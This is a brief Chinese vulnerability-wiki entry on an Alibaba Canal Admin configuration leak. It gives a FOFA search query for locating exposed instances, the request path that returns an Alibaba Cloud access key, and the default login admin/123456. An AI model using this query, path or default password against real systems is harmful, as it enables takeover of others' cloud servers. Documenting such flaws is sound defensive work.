Loading
0

Alibaba Canal config 云密钥信息泄露漏洞

免费、自由、人人可编辑的漏洞库

,

FOFA

title="Canal Admin"

Payload

/api/v1/canal/config/1/0

其中泄露了 aliyun.access 密钥,可以控制密钥下的所有服务器

其中还含有默认口令 admin/123456

免费、自由、人人可编辑的漏洞库